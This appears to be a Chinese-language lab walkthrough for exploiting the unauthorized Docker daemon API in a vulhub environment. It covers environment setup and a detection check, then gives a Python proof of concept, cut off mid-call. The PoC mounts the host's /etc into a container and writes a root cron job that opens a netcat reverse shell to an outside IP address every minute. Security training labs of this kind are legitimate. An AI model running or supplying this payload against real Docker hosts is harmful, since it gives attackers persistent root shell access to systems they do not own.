1.进入 vulhub 的 docker daemon api 未授权访问漏洞 路径
cd /usr/local/tools/vulhub/docker/unauthorized-rce
2.编译并启动环境
docker-compose up -d
3.查看环境运行状态
docker ps | grep rce
漏洞检测
访问 http://139.196.87.102:2375/version
,若能访问并如下图所示,证明存在未授权访问漏洞。
漏洞利用
POC
import docker
client = docker.DockerClient(base_url=‘http://139.196.87.102:2375/’)
data = client.containers.run(‘alpine:latest’, r’‘‘sh -c “echo ‘*/1 * * * * /usr/bin/nc 47.98.192.99 22222 -e /bin/sh’ >> /tmp/etc/crontabs/root” ‘’’, remove=True, volumes={’/etc’: {